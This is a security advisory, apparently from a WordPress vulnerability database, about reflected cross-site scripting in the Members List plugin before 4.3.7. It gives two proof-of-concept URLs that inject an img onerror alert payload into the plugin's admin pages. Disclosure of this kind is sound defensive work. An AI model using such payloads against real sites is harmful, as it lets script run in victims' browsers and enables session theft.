Members List < 4.3.7 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg/src/onerror=alert(/XSS/)%20x
https://example.com/wp-content/plugins/members-list/admin/view/list.php?page="><img/src/onerror=alert(/XSS/) x

Affects Plugins

Fixed in 4.3.7

References

URL

https://plugins.trac.wordpress.org/changeset/2692740

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Jan w Oleju

Submitter

Jan w Oleju

Verified

Yes

WPVDB ID

d13f26f0-5d91-49d7-b514-1577d4247648

Timeline

Publicly Published

2022-03-14 (about 3 years ago)

Added

2022-03-14 (about 3 years ago)

Last Updated

2022-03-14 (about 3 years ago)

Other

Published

Title

Published

2025-03-27

Title

SKU Generator for WooCommerce < 1.6.3 - Reflected Cross-Site Scripting

Published

2025-01-24

Title

WP Google Map < 1.9.4 - Admin+ Stored XSS

Published

2023-12-21

Title

Easy Forms for Mailchimp < 6.9.0 - Admin+ Stored Cross-Site Scripting

Published

2020-01-15

Title

YOP Poll < 6.1.2 - Reflected Cross-Site Scripting

Published

2023-06-02

Title

Download SpamReferrerBlock <= 2.22 - Admin+ Stored XSS